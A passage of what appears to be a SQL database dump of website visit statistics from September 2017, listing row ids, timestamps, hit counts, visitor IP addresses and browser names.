ther'),(154181,1504885308,1,1,0,0,'95.132.132.217','chrome'),(154182,1504885411,1,1,0,0,'217.182.132.88','other'),(154183,1504885453,1,1,0,0,'107.167.105.166','opera'),(154184,1504885565,1,1,0,0,'5.45.207.64','other'),(154185,1504885568,1,1,0,0,'141.8.183.1','other'),(154186,1504885737,1,1,0,0,'217.182.132.25','other'),(154187,1504885889,19,19,0,0,'52.212.223.84','other'),(154188,1504886067,1,1,0,0,'37.73.250.243','chrome'),(154189,1504886196,1,1,0,0,'95.108.181.63','other'),(154190,1504886208,1,1,0,0,'5.45.207.43','other'),(154191,1504886404,1,1,0,0,'91.195.157.194','chrome'),(154192,1504886419,4,4,0,0,'91.209.11.236','other'),(154193,1504886715,1,0,1,0,'66.249.66.157',''),(154194,1504887011,1,1,0,0,'216.244.66.237','other'),(154195,1504887042,1,1,0,0,'51.255.65.72','other'),(154196,1504887133,1,1,0,0,'178.154.200.36','other'),(154197,1504887205,1,1,0,0,'51.255.65.65','other'),(154198,1504887410,2,2,0,0,'141.8.183.1','other'),(154199,1504887490,2,2,0,0,'5.45.207.64','other'),(154200,1504887521,1,1,0,0,'40.77.167.101','other'),(154201,1504887843,1,1,0,0,'95.132.132.217','chrome'),(154202,1504888185,1,1,0,0,'91.209.11.236','other'),(154203,1504888302,1,1,0,0,'163.172.255.19','chrome'),(154204,1504888550,1,1,0,0,'51.255.65.24','other'),(154205,1504888760,1,1,0,0,'5.45.207.32','other'),(154206,1504888944,1,1,0,0,'212.113.42.16','chrome'),(154207,1504889110,1,1,0,0,'91.196.178.130','chrome'),(154208,1504889258,1,1,0,0,'137.74.207.119','other'),(154209,1504889282,1,1,0,0,'91.209.11.236','other'),(154210,1504889311,1,1,0,0,'5.45.207.56','other'),(154211,1504889357,1,1,0,0,'162.210.196.130','other'),(154212,1504889408,1,1,0,0,'51.255.71.131','other'),(154213,1504889426,1,1,0,0,'164.132.162.159','other'),(154214,1504889689,1,1,0,0,'5.255.253.4','other'),(154215,1504889692,1,1,0,0,'37.9.113.94','other'),(154216,1504889765,1,1,0,0,'141.8.142.21','other'),(154217,1504889882,1,1,0,0,'51.255.71.126','other'),(154218,1504889888,1,1,0,0,'141.8.142.25','other'),(154219,1504890056,1,1,0,0,'95.134.203.132','chrome'),(154220,1504890075,1,1,0,0,'5.45.207.64','other'),(154221,1504890131,1,1,0,0,'51.255.71.120','other'),(154222,1504890308,1,1,0,0,'51.255.65.224','other'),(154223,1504890455,1,1,0,0,'51.255.65.74','other'),(154224,1504890519,1,1,0,0,'164.132.164.180','other'),(154225,1504890718,1,0,1,0,'66.249.76.107',''),(154226,1504890800,1,1,0,0,'157.55.39.42','other'),(154227,1504890942,1,1,0,0,'107.167.107.100','opera'),(154228,1504891078,1,1,0,0,'157.55.39.92','other'),(154229,1504891391,1,1,0,0,'91.196.178.65','chrome'),(154230,1504891604,1,1,0,0,'5.45.207.64','other'),(154231,1504891696,1,0,1,0,'66.249.66.157',''),(154232,1504891772,1,1,0,0,'165.227.92.231','chrome'),(154233,1504891842,1,1,0,0,'37.53.231.63','firefox'),(154234,1504891885,1,1,0,0,'107.167.104.205','other'),(154235,1504891960,1,1,0,0,'37.53.227.30','chrome'),(154236,1504892080,1,1,0,0,'37.52.23.135','chrome'),(154237,1504892113,1,1,0,0,'91.209.11.236','other'),(154238,1504892177,1,1,0,0,'91.196.178.70','chrome'),(154239,1504892220,1,1,0,0,'188.166.56.204','chrome'),(154240,1504892388,1,1,0,0,'107.167.109.3','opera'),(154241,1504892419,1,1,0,0,'188.166.70.190','chrome'),(154242,1504892451,1,1,0,0,'91.196.178.37','chrome'),(154243,1504892546,1,1,0,0,'188.255.99.234','chrome'),(154244,1504892883,2,1,1,0,'66.249.76.89',''),(154245,1504892917,1,1,0,0,'8.29.198.25','other'),(154246,1504892995,1,0,1,0,'66.249.76.108',''),(154247,1504893051,1,1,0,0,'91.196.179.134','chrome'),(154248,1504893087,2,2,0,0,'141.8.183.1','other'),(154249,1504894137,1,1,0,0,'141.8.142.21','other'),(154250,1504894156,2,2,0,0,'5.45.207.64','other'),(154251,1504894228,1,1,0,0,'141.8.183.1','other'),(154252,1504894232,1,1,0,0,'157.55.39.92','other'),(154253,1504894273,1,1,0,0,'91.196.179.134','chrome'),(154254,1504894439,1,1,0,0,'217.182.132.96','other'),(154255,1504894613,1,1,0,0,'163.172.255.19','chrome'),(154256,1504894637,1,1,0,0,'107.167.116.115','other'),(154257,1504894651,1,1,0,0,'217.182.132.62','other'),(154258,1504894682,1,1,0,0,'37.54.22.131','chrome'),(154259,1504894822,1,1,0,0,'91.196.178.99','chrome'),(154260,1504894836,1,1,0,0,'91.196.178.66','chrome'),(154261,1504894946,1,1,0,0,'157.185.131.59','other'),(154262,1504894985,1,1,0,0,'91.209.11.236','other'),(154263,1504894987,1,1,0,0,'168.235.200.247','chrome'),(154264,1504895068,1,1,0,0,'5.45.207.64','other'),(154265,1504895156,1,1,0,0,'51.255.65.14','other'),(154266,1504895196,1,1,0,0,'91.196.178.69','chrome'),(154267,1504895294,1,1,0,0,'91.196.178.34','chrome'),(154268,1504895315,1,1,0,0,'51.255.65.62','other'),(154269,1504895339,1,1,0,0,'107.167.112.155','other'),(154270,1504895351,1,1,0,0,'93.91.49.3','chrome'),(154271,1504895395,1,1,0,0,'178.71.222.81','firefox'),(154272,1504895566,1,1,0,0,'51.255.71.130','other'),(154273,1504895866,1,1,0,0,'130.180.217.116','chrome'),(154274,1504896006,2,2,0,0,'5.45.207.64','other'),(154275,1504896217,1,1,0,0,'51.255.65.31','other'),(154276,1504897001,2,2,0,0,'91.209.11.236','other'),(154277,1504897035,1,1,0,0,'5.45.207.64','other'),(154278,1504897074,1,0,1,0,'66.249.76.91',''),(154279,1504897306,1,1,0,0,'37.54.22.75','firefox'),(154280,1504897465,1,1,0,0,'91.196.178.133','chrome'),(154281,1504897595,1,1,0,0,'217.182.132.157','other'),(154282,1504897770,1,1,0,0,'51.255.65.21','other'),(154283,1504897990,1,1,0,0,'91.209.11.236','other'),(154284,1504898078,1,1,0,0,'130.180.217.71','opera'),(154285,1504898321,1,1,0,0,'95.132.34.10','firefox'),(154286,1504898450,1,1,0,0,'137.74.201.108','other'),(154287,1504898529,1,0,1,0,'66.249.66.155',''),(154288,1504898751,2,2,0,0,'217.42.57.120','firefox'),(154289,1504898921,1,1,0,0,'51.255.65.68','other'),(154290,1504898952,2,2,0,0,'91.209.11.236','other'),(154291,1504899094,1,1,0,0,'107.167.108.133','opera'),(154292,1504899239,1,0,1,0,'66.249.76.109',''),(154293,1504899624,1,1,0,0,'91.196.178.132','chrome'),(154294,1504899732,1,1,0,0,'185.105.88.240','chrome'),(154295,1504900067,1,1,0,0,'91.196.178.66','chrome'),(154296,1504900146,1,1,0,0,'51.255.65.23','other'),(154297,1504900322,1,1,0,0,'217.182.132.152','other'),(154298,1504900786,1,1,0,0,'91.209.11.236','other'),(154299,1504900906,1,1,0,0,'37.73.215.143','chrome'),(154300,1504901157,1,1,0,0,'91.196.178.135','chrome'),(154301,1504901356,1,1,0,0,'107.167.108.133','opera'),(154302,1504901398,1,1,0,0,'82.146.46.159','chrome'),(154303,1504901411,2,2,0,0,'82.146.46.159','other'),(154304,1504901442,1,1,0,0,'37.73.227.174','other'),(154305,1504901959,1,0,1,0,'66.249.76.93',''),(154306,1504902029,1,1,0,0,'193.182.144.204','chrome'),(154307,1504902067,1,1,0,0,'217.182.132.6','other'),(154308,1504902608,1,1,0,0,'217.182.132.187','other'),(154309,1504902648,1,1,0,0,'91.196.178.103','chrome'),(154310,1504902718,3,3,0,0,'91.209.11.236','other'),(154311,1504902725,1,1,0,0,'217.182.132.193','other'),(154312,1504903013,1,1,0,0,'40.77.167.101','other'),(154313,1504903089,1,1,0,0,'77.123.105.58','chrome'),(154314,1504903111,1,1,0,0,'8.37.234.172','other'),(154315,1504903236,1,1,0,0,'107.167.106.58','opera'),(154316,1504903494,1,1,0,0,'91.196.178.136','chrome'),(154317,1504903499,1,1,0,0,'217.69.135.204','other'),(154318,1504903605,1,0,1,0,'66.249.66.155',''),(154319,1504903750,1,1,0,0,'8.29.198.26','other'),(154320,1504903821,1,1,0,0,'217.182.132.151','other'),(154321,1504903989,1,1,0,0,'91.196.178.33','chrome'),(154322,1504904445,1,0,1,0,'66.249.76.108',''),(154323,1504904549,2,2,0,0,'91.209.11.236','other'),(154324,1504904793,1,1,0,0,'164.132.162.158','other'),(154325,1504904821,1,0,1,0,'66.249.66.74',''),(154326,1504905319,1,1,0,0,'91.196.178.39','firefox'),(154327,1504905415,1,1,0,0,'217.182.132.58','other'),(154328,1504905941,1,1,0,0,'51.255.65.64','other'),(154329,1504905994,1,1,0,0,'180.76.15.158','other'),(154330,1504906145,1,1,0,0,'66.249.76.108','chrome'),(154331,1504906398,2,2,0,0,'5.45.207.64','other'),(154332,1504906679,1,1,0,0,'91.209.11.236','other'),(154333,1504906769,2,2,0,0,'173.208.169.250','msie'),(154334,1504906831,1,1,0,0,'217.182.132.178','other'),(154335,1504906888,1,1,0,0,'137.74.207.164','other'),(154336,1504907722,1,1,0,0,'164.132.162.160','other'),(154337,1504908328,1,1,0,0,'91.196.178.104','other'),(154338,1504908399,1,1,0,0,'138.68.176.150','other'),(154339,1504908428,1,1,0,0,'217.182.132.7','other'),(154340,1504908673,1,1,0,0,'91.209.11.236','other'),(154341,1504908833,1,1,0,0,'193.182.144.204','chrome'),(154342,1504909194,1,1,0,0,'51.255.65.63','other'),(154343,1504909246,1,1,0,0,'51.255.65.85','other'),(154344,1504910052,1,1,0,0,'91.209.11.236','other'),(154345,1504910225,1,1,0,0,'163.172.255.19','chrome'),(154346,1504910406,1,0,1,0,'66.249.66.157',''),(154347,1504910654,1,1,0,0,'137.74.207.120','other'),(154348,1504911033,1,1,0,0,'217.182.132.25','other'),(154349,1504911203,1,1,0,0,'51.255.65.20','other'),(154350,1504911315,1,1,0,0,'51.255.65.40','other'),(154351,1504911337,2,2,0,0,'141.8.183.1','other'),(154352,1504911352,1,1,0,0,'51.255.65.97','other'),(154353,1504911603,1,1,0,0,'217.182.132.37','other'),(154354,1504911905,1,1,0,0,'51.255.65.88','other'),(154355,1504912108,1,1,0,0,'77.123.105.58','opera'),(154356,1504912242,1,1,0,0,'141.8.183.1','other'),(154357,1504912516,1,1,0,0,'51.255.65.60','other'),(154358,1504912903,1,1,0,0,'51.255.65.5','other'),(154359,1504912918,2,2,0,0,'5.45.207.64','other'),(154360,1504913102,1,1,0,0,'51.255.65.19','other'),(154361,1504913456,1,1,0,0,'217.182.132.82','other'),(154362,1504913885,1,0,1,0,'66.249.76.107',''),(154363,1504913979,1,0,1,0,'66.249.76.93',''),(154364,1504913986,1,0,1,0,'66.249.76.91',''),(154365,1504914103,1,1,0,0,'163.172.255.19','chrome'),(154366,1504914285,3,3,0,0,'141.8.183.1','other'),(154367,1504914517,1,1,0,0,'141.8.142.21','other'),(154368,1504914580,1,1,0,0,'8.29.198.27','other'),(154369,1504914740,1,0,1,0,'66.249.76.109',''),(154370,1504915222,1,1,0,0,'123.160.233.137','chrome'),(154371,1504915640,1,1,0,0,'141.8.183.1','other'),(154372,1504915888,2,2,0,0,'5.45.207.64','other'),(154373,1504916955,1,1,0,0,'141.8.183.1','other'),(154374,1504918116,1,1,0,0,'141.8.183.1','other'),(154375,1504919288,2,2,0,0,'141.8.183.1','other'),(154376,1504919402,2,2,0,0,'5.45.207.64','other'),(154377,1504919590,1,1,0,0,'216.244.66.237','other'),(154378,1504920071,1,1,0,0,'95.220.208.74','msie'),(154379,1504920072,1,1,0,0,'95.220.66.133','msie'),(154380,1504920827,1,0,1,0,'66.249.76.107',''),(154381,1504921004,3,3,0,0,'5.45.207.64','other'),(154382,1504921102,1,0,1,0,'66.249.66.157',''),(154383,1504921168,2,0,2,0,'66.249.66.156',''),(154384,1504923935,2,2,0,0,'5.45.207.64','other'),(154385,1504924601,1,1,0,0,'141.8.183.1','other'),(154386,1504924675,1,1,0,0,'141.8.142.21','other'),(154387,1504925407,1,1,0,0,'8.29.198.26','other'),(154388,1504925733,1,1,0,0,'5.45.207.64','other'),(154389,1504927031,1,1,0,0,'198.200.99.165','firefox'),(154390,1504927472,1,1,0,0,'217.182.132.57','other'),(154391,1504928032,1,1,0,0,'217.182.132.175','other'),(154392,1504928240,1,1,0,0,'217.182.132.4','other'),(154393,1504928246,1,1,0,0,'52.214.114.64','other'),(154394,1504929148,1,0,1,0,'66.249.76.107',''),(154395,1504929387,1,1,0,0,'141.8.183.1','other'),(154396,1504929500,3,3,0,0,'5.45.207.64','other'),(154397,1504929656,1,1,0,0,'91.196.178.130','chrome'),(154398,1504929657,1,1,0,0,'91.196.178.71','chrome'),(154399,1504929705,1,1,0,0,'137.74.201.100','other'),(154400,1504929789,1,1,0,0,'217.182.132.186','other'),(154401,1504930425,1,0,1,0,'66.249.66.156',''),(154402,1504930511,2,2,0,0,'5.45.207.64','other'),(154403,1504930524,2,2,0,0,'91.209.11.236','other'),(154404,1504931192,1,0,1,0,'66.249.66.157',''),(154405,1504931453,1,1,0,0,'137.74.207.109','other'),(154406,1504931458,1,1,0,0,'51.255.65.91','other'),(154407,1504931620,1,1,0,0,'51.255.65.76','other'),(154408,1504931702,1,1,0,0,'217.182.132.148','other'),(154409,1504931896,2,2,0,0,'91.209.11.236','other'),(154410,1504932213,1,1,0,0,'95.132.132.251','chrome'),(154411,1504932425,1,1,0,0,'92.113.156.228','chrome'),(154412,1504932606,2,2,0,0,'141.8.183.1','other'),(154413,1504932802,1,1,0,0,'180.76.15.144','other'),(154414,1504933456,1,1,0,0,'51.255.71.123','other'),(154415,1504933747,1,1,0,0,'66.249.83.221','chrome'),(154416,1504933748,1,1,0,0,'66.249.83.220','chrome'),(154417,1504933780,1,1,0,0,'217.182.132.82','other'),(154418,1504933905,1,1,0,0,'5.45.207.64','other'),(154419,1504934125,1,1,0,0,'141.8.142.21','other'),(154420,1504934309,1,1,0,0,'91.196.178.38','chrome'),(154421,1504934352,1,1,0,0,'51.255.65.36','other'),(154422,1504934905,1,1,0,0,'217.182.132.240','other'),(154423,1504935133,1,1,0,0,'107.167.108.133','opera'),(154424,1504935447,1,1,0,0,'217.182.132.95','other'),(154425,1504935718,1,1,0,0,'217.182.132.60','other'),(154426,1504935991,1,1,0,0,'51.255.65.6','other'),(154427,1504936068,1,1,0,0,'51.255.65.12','other'),(154428,1504936159,2,0,2,0,'66.249.76.109',''),(154429,1504936233,1,1,0,0,'8.29.198.27','other'),(154430,1504936392,1,1,0,0,'51.255.65.41','other'),(154431,1504936593,1,1,0,0,'107.167.108.133','opera'),(154432,1504936706,1,1,0,0,'5.45.207.64','other'),(154433,1504936756,1,1,0,0,'137.74.207.119','other'),(154434,1504936827,1,1,0,0,'91.196.178.101','firefox'),(154435,1504936952,1,1,0,0,'107.167.106.81','other'),(154436,1504937130,1,1,0,0,'173.77.10.155','firefox'),(154437,1504937802,1,1,0,0,'107.167.106.112','opera'),(154438,1504938162,1,1,0,0,'217.182.132.149','other'),(154439,1504938384,1,1,0,0,'5.45.207.64','other'),(154440,1504938526,1,1,0,0,'107.167.108.133','opera'),(154441,1504938761,63,63,0,0,'89.163.243.39','other'),(154442,1504939023,1,1,0,0,'95.108.181.60','other'),(154443,1504939545,1,0,1,0,'66.249.66.76',''),(154444,1504940523,1,1,0,0,'141.8.183.1','other'),(154445,1504940713,1,0,1,0,'66.249.76.109',''),(154446,1504940767,1,0,1,0,'66.249.66.75',''),(154447,1504940769,1,1,0,0,'5.45.207.64','other'),(154448,1504941139,1,1,0,0,'95.132.14.75','chrome'),(154449,1504941385,1,1,0,0,'66.249.66.156','chrome'),(154450,1504942335,1,1,0,0,'157.185.131.93','other'),(154451,1504942513,1,1,0,0,'141.8.183.1','other'),(154452,1504943548,1,1,0,0,'107.182.226.251','chrome'),(154453,1504943564,1,1,0,0,'66.102.9.27','chrome'),(154454,1504944348,1,1,0,0,'141.8.183.1','other'),(154455,1504944470,1,1,0,0,'66.249.76.91','chrome'),(154456,1504944471,1,0,1,0,'66.249.66.74',''),(154457,1504944986,1,1,0,0,'5.45.207.64','other'),(154458,1504945985,2,2,0,0,'141.8.183.1','other'),(154459,1504946311,1,1,0,0,'91.209.11.236','other'),(154460,1504946317,1,1,0,0,'162.210.196.130','other'),(154461,1504946378,4,4,0,0,'5.9.152.170','other'),(154462,1504946841,1,0,1,0,'66.249.76.107',''),(154463,1504946897,2,2,0,0,'141.8.183.1','other'),(154464,1504947058,1,1,0,0,'8.29.198.25','other'),(154465,1504947404,1,1,0,0,'107.167.106.142','opera'),(154466,1504947487,1,1,0,0,'217.69.133.9','other'),(154467,1504947494,1,1,0,0,'217.182.132.85','other'),(154468,1504947855,1,1,0,0,'46.161.9.39','chrome'),(154469,1504948120,2,2,0,0,'66.249.76.107','chrome'),(154470,1504948257,1,1,0,0,'217.182.132.188','other'),(154471,1504948582,1,1,0,0,'51.255.65.23','other'),(154472,1504948604,1,1,0,0,'141.8.142.21','other'),(154473,1504949022,1,1,0,0,'217.182.132.58','other'),(154475,1504949427,1,1,0,0,'5.255.253.29','other'),(154476,1504949778,1,1,0,0,'91.196.178.37','other'),(154477,1504949799,2,2,0,0,'91.209.11.236','other'),(154478,1504950369,2,2,0,0,'37.53.122.217','chrome'),(154479,1504950410,1,1,0,0,'217.69.133.194','other'),(154480,1504950430,1,1,0,0,'217.182.132.52','other'),(154481,1504950482,1,1,0,0,'37.73.203.60','chrome'),(154482,1504950512,2,2,0,0,'5.45.207.64','other'),(154483,1504950775,1,1,0,0,'164.132.162.153','other'),(154484,1504950860,1,1,0,0,'157.55.39.92','other'),(154485,1504950975,1,1,0,0,'5.45.207.57','other'),(154486,1504951432,1,1,0,0,'91.209.11.236','other'),(154487,1504951468,1,1,0,0,'141.8.142.21','other'),(154488,1504951693,1,1,0,0,'141.8.183.1','other'),(154489,1504951731,1,1,0,0,'95.132.12.27','firefox'),(154490,1504951800,1,1,0,0,'91.196.178.165','chrome'),(154491,1504952180,1,1,0,0,'217.182.132.68','other'),(154492,1504952304,1,1,0,0,'51.255.65.4','other'),(154493,1504952335,1,1,0,0,'91.196.178.36','chrome'),(154494,1504952461,1,1,0,0,'5.45.207.64','other'),(154495,1504952532,1,1,0,0,'141.8.142.83','other'),(154496,1504952827,1,1,0,0,'5.45.207.32','other'),(154497,1504952830,1,1,0,0,'5.45.207.42','other'),(154498,1504952850,1,1,0,0,'217.182.132.25','other'),(154499,1504953111,1,1,0,0,'217.182.132.151','other'),(154500,1504953190,1,1,0,0,'217.182.132.154','other'),(154501,1504953454,1,1,0,0,'217.182.132.14','other'),(154502,1504953480,1,1,0,0,'91.196.178.103','chrome'),(154503,1504953584,2,0,2,0,'66.249.76.91',''),(154504,1504953745,1,1,0,0,'66.249.66.157','chrome'),(154505,1504953787,1,1,0,0,'91.196.178.164','chrome'),(154506,1504953892,1,0,1,0,'66.249.76.108',''),(154507,1504953931,1,1,0,0,'157.55.39.42','other'),(154508,1504953934,1,1,0,0,'51.255.65.97','other'),(154509,1504953947,1,0,1,0,'66.249.76.89',''),(154510,1504954304,1,1,0,0,'5.45.207.64','other'),(154511,1504954520,1,1,0,0,'91.209.11.236','other'),(154512,1504955022,1,1,0,0,'141.8.183.1','other'),(154513,1504955641,1,1,0,0,'217.182.132.66','other'),(154514,1504955772,1,1,0,0,'51.255.65.53','other'),(154515,1504955967,1,1,0,0,'107.167.104.16','opera'),(154516,1504956366,3,3,0,0,'141.8.183.1','other'),(154517,1504956619,1,1,0,0,'91.196.178.100','firefox'),(154518,1504956788,1,1,0,0,'137.74.207.114','other'),(154519,1504956851,1,1,0,0,'91.209.11.236','other'),(154520,1504957190,1,1,0,0,'51.255.65.96','other'),(154521,1504957629,1,1,0,0,'107.167.106.58','opera'),(154522,1504957709,1,1,0,0,'217.182.132.50','other'),(154523,1504957711,1,1,0,0,'91.196.178.99','chrome'),(154524,1504957816,1,1,0,0,'5.45.207.32','other'),(154525,1504957891,1,1,0,0,'8.29.198.26','other'),(154526,1504958484,1,1,0,0,'46.133.131.225','chrome'),(154527,1504958679,1,1,0,0,'5.45.207.57','other'),(154528,1504959158,1,1,0,0,'217.182.132.33','other'),(154529,1504959279,1,1,0,0,'5.45.207.64','other'),(154530,1504959337,1,1,0,0,'51.255.65.28','other'),(154531,1504959481,1,1,0,0,'217.182.132.147','other'),(154532,1504959515,1,1,0,0,'51.255.65.3','other'),(154533,1504959581,1,1,0,0,'188.163.18.125','chrome'),(154534,1504959584,1,1,0,0,'51.255.65.51','other'),(154535,1504960136,1,0,1,0,'66.249.76.91',''),(154536,1504960267,1,1,0,0,'217.182.132.187','other'),(154537,1504960282,1,1,0,0,'107.167.106.58','opera'),(154538,1504960433,1,1,0,0,'91.209.11.236','other'),(154539,1504960734,1,1,0,0,'107.167.107.56','opera'),(154540,1504961017,1,1,0,0,'178.154.200.7','other'),(154541,1504961187,1,1,0,0,'157.55.39.42','other'),(154542,1504961347,1,1,0,0,'141.8.183.1','other'),(154543,1504961367,1,0,1,0,'66.249.66.157',''),(154544,1504961491,1,1,0,0,'5.45.207.64','other'),(154545,1504962555,1,1,0,0,'107.167.107.56','opera'),(154546,1504963149,1,1,0,0,'157.55.39.42','other'),(154547,1504963392,1,1,0,0,'217.182.132.21','other'),(154548,1504963796,1,1,0,0,'51.255.65.18','other'),(154549,1504963806,1,1,0,0,'107.167.109.179','other'),(154550,1504964277,1,1,0,0,'107.167.106.58','opera'),(154551,1504964281,1,1,0,0,'217.182.132.90','other'),(154552,1504964576,1,1,0,0,'51.255.65.95','other'),(154553,1504964997,1,1,0,0,'107.167.107.56','opera'),(154554,1504965046,1,1,0,0,'5.45.207.64','other'),(154555,1504965436,1,1,0,0,'141.8.142.21','other'),(154556,1504965645,1,1,0,0,'5.45.207.32','other'),(154557,1504965833,1,1,0,0,'51.255.71.98','other'),(154558,1504965995,1,1,0,0,'91.209.11.236','other'),(154559,1504966279,1,0,1,0,'66.249.66.155',''),(154560,1504966393,1,1,0,0,'141.8.142.21','other'),(154561,1504966415,1,1,0,0,'217.182.132.76','other'),(154562,1504966485,1,1,0,0,'91.196.178.130','chrome'),(154563,1504966839,1,1,0,0,'51.255.65.58','other'),(154564,1504966998,1,1,0,0,'217.182.132.153','other'),(154565,1504967184,2,2,0,0,'91.209.11.236','other'),(154566,1504967616,2,2,0,0,'141.8.183.1','other'),(154567,1504967683,2,2,0,0,'5.45.207.64','other'),(154568,1504967740,1,1,0,0,'91.196.178.130','chrome'),(154569,1504967768,1,1,0,0,'5.45.207.56','other'),(154570,1504967854,1,1,0,0,'137.74.201.108','other'),(154571,1504967983,1,1,0,0,'141.8.142.83','other'),(154572,1504968131,1,1,0,0,'46.201.113.89','chrome'),(154573,1504968572,1,1,0,0,'107.167.107.132','other'),(154574,1504968712,1,1,0,0,'8.29.198.26','other'),(154575,1504969043,1,1,0,0,'107.167.106.58','opera'),(154576,1504969087,1,1,0,0,'141.8.183.1','other'),(154577,1504969236,1,1,0,0,'217.182.132.82','other'),(154578,1504969238,1,1,0,0,'91.209.11.236','other'),(154579,1504970328,1,1,0,0,'141.8.142.21','other'),(154580,1504970504,1,1,0,0,'141.8.183.1','other'),(154581,1504970556,1,1,0,0,'51.255.71.110','other'),(154582,1504970887,1,1,0,0,'217.182.132.84','other'),(154583,1504971099,1,1,0,0,'185.114.34.23','chrome'),(154584,1504971464,1,1,0,0,'141.8.183.1','other'),(154585,1504971474,1,1,0,0,'157.55.39.92','other'),(154586,1504971808,1,1,0,0,'40.77.167.101','other'),(154587,1504971966,1,1,0,0,'217.182.132.4','other'),(154588,1504972223,1,1,0,0,'217.182.132.50','other'),(154589,1504972428,1,0,1,0,'66.249.76.107',''),(154590,1504972674,2,2,0,0,'5.45.207.64','other'),(154591,1504973109,1,0,1,0,'66.249.66.74',''),(154592,1504973237,1,1,0,0,'91.196.178.71','chrome'),(154593,1504973662,7,7,0,0,'142.4.200.37','other'),(154594,1504973779,1,1,0,0,'5.45.207.64','other'),(154595,1504974144,1,1,0,0,'193.19.84.129','chrome'),(154596,1504974263,1,1,0,0,'141.8.142.45','other'),(154597,1504974301,1,0,1,0,'66.249.76.91',''),(154598,1504974927,1,1,0,0,'157.55.39.92','other'),(154599,1504975030,1,0,1,0,'66.249.76.108',''),(154600,1504975123,2,2,0,0,'5.45.207.64','other'),(154601,1504975142,1,1,0,0,'217.182.132.149','other'),(154602,1504975304,1,1,0,0,'188.166.25.120','chrome'),(154603,1504976769,1,1,0,0,'66.249.76.91','chrome'),(154604,1504976834,1,1,0,0,'91.209.11.236','other'),(154605,1504977501,1,1,0,0,'137.74.207.102','other'),(154606,1504977560,1,1,0,0,'37.73.244.250','chrome'),(154607,1504977911,1,1,0,0,'213.180.203.32','other'),(154608,1504977912,1,1,0,0,'151.80.27.118','other'),(154609,1504977919,1,1,0,0,'91.196.178.134','chrome'),(154610,1504978092,1,1,0,0,'91.196.178.167','chrome'),(154611,1504978118,1,1,0,0,'95.108.181.69','other'),(154612,1504978310,1,0,1,0,'66.249.76.108',''),(154613,1504978443,1,1,0,0,'95.108.181.58','other'),(154614,1504978533,1,1,0,0,'137.74.207.110','other'),(154615,1504978562,1,1,0,0,'141.8.183.1','other'),(154616,1504978909,1,1,0,0,'217.182.132.183','other'),(154617,1504978956,1,1,0,0,'40.77.167.101','other'),(154618,1504979210,2,2,0,0,'5.45.207.64','other'),(154619,1504979355,1,1,0,0,'66.249.76.108','chrome'),(154620,1504979367,1,1,0,0,'217.182.132.88','other'),(154621,1504979524,1,1,0,0,'107.167.106.58','opera'),(154622,1504979526,1,1,0,0,'157.55.39.42','other'),(154623,1504979544,1,1,0,0,'8.29.198.25','other'),(154624,1504979672,1,1,0,0,'141.8.142.21','other'),(154625,1504979697,1,1,0,0,'107.167.109.63','opera'),(154626,1504979807,1,1,0,0,'91.196.178.38','chrome'),(154627,1504980012,1,1,0,0,'91.196.178.36','chrome'),(154628,1504980089,1,1,0,0,'5.45.207.32','other'),(154629,1504980237,1,1,0,0,'51.255.71.115','other'),(154630,1504980664,1,1,0,0,'46.133.147.232','chrome'),(154631,1504980756,1,1,0,0,'37.73.241.19','chrome'),(154632,1504981246,2,2,0,0,'91.209.11.236','other'),(154633,1504981256,1,1,0,0,'141.8.183.1','other'),(154634,1504981259,1,1,0,0,'95.108.181.63','other'),(154635,1504981522,2,2,0,0,'37.54.22.131','chrome'),(154636,1504981541,1,1,0,0,'37.115.124.229','chrome'),(154637,1504981862,1,1,0,0,'217.182.132.53','other'),(154638,1504982401,1,1,0,0,'207.154.216.175','chrome'),(154639,1504982526,1,1,0,0,'164.132.162.153','other'),(154640,1504982616,1,1,0,0,'157.55.39.134','other'),(154641,1504982671,1,1,0,0,'95.108.181.78','other'),(154642,1504982831,1,1,0,0,'5.45.207.64','other'),(154643,1504983092,1,1,0,0,'217.182.132.36','other'),(154644,1504983107,1,0,1,0,'66.249.76.93',''),(154645,1504983229,20,20,0,0,'154.16.138.15','other'),(154646,1504983481,1,1,0,0,'178.92.8.67','firefox'),(154647,1504983757,2,2,0,0,'91.209.11.236','other'),(154648,1504983991,1,1,0,0,'5.45.207.64','other'),(154649,1504983996,1,1,0,0,'141.8.142.21','other'),(154650,1504984310,1,1,0,0,'217.182.132.28','other'),(154651,1504985004,1,1,0,0,'83.245.232.174','chrome'),(154652,1504985121,1,1,0,0,'51.255.65.41','other'),(154653,1504985652,1,1,0,0,'5.45.207.40','other'),(154654,1504986064,1,1,0,0,'91.209.11.236','other'),(154655,1504986077,1,1,0,0,'178.154.200.7','other'),(154656,1504986368,1,1,0,0,'107.167.104.205','opera'),(154657,1504986884,1,1,0,0,'217.182.132.148','other'),(154658,1504987051,1,1,0,0,'217.182.132.155','other'),(154659,1504987082,1,1,0,0,'217.182.132.77','other'),(154660,1504987109,1,1,0,0,'40.77.167.101','other'),(154661,1504987182,1,1,0,0,'217.182.132.35','other'),(154662,1504987921,2,2,0,0,'91.209.11.236','other'),(154663,1504988017,1,1,0,0,'51.255.65.18','other'),(154664,1504988044,1,1,0,0,'51.255.65.17','other'),(154665,1504988178,1,1,0,0,'217.182.132.79','other'),(154666,1504988228,1,1,0,0,'51.255.65.79','other'),(154667,1504988372,1,1,0,0,'51.255.65.16','other'),(154668,1504988605,1,1,0,0,'217.182.132.62','other'),(154669,1504988622,1,1,0,0,'8.37.234.172','other'),(154670,1504988904,1,1,0,0,'164.132.162.159','other'),(154671,1504989196,1,1,0,0,'107.167.107.238','opera'),(154672,1504989426,1,1,0,0,'217.182.132.33','other'),(154673,1504989556,1,1,0,0,'91.209.11.236','other'),(154674,1504989798,1,1,0,0,'217.182.132.16','other'),(154675,1504990297,3,3,0,0,'5.45.207.64','other'),(154676,1504990366,1,1,0,0,'8.29.198.26','other'),(154677,1504990420,1,1,0,0,'51.255.65.9','other'),(154678,1504990523,1,1,0,0,'91.196.178.103','chrome'),(154679,1504990524,1,1,0,0,'173.252.88.92','other'),(154680,1504990541,1,1,0,0,'173.252.88.93','other'),(154681,1504990737,1,1,0,0,'92.112.248.209','chrome'),(154682,1504990843,1,1,0,0,'91.196.178.130','chrome'),(154683,1504991478,2,1,1,0,'66.249.76.91',''),(154684,1504991511,2,2,0,0,'5.45.207.64','other'),(154685,1504991599,1,1,0,0,'217.182.132.6','other'),(154686,1504991825,1,1,0,0,'217.182.132.84','other'),(154687,1504992096,1,1,0,0,'51.255.65.21','other'),(154688,1504992458,1,1,0,0,'141.8.142.21','other'),(154689,1504992884,2,2,0,0,'5.45.207.64','other'),(154690,1504993047,1,0,1,0,'66.249.76.108',''),(154691,1504993467,1,1,0,0,'66.249.66.155','chrome'),(154692,1504993819,1,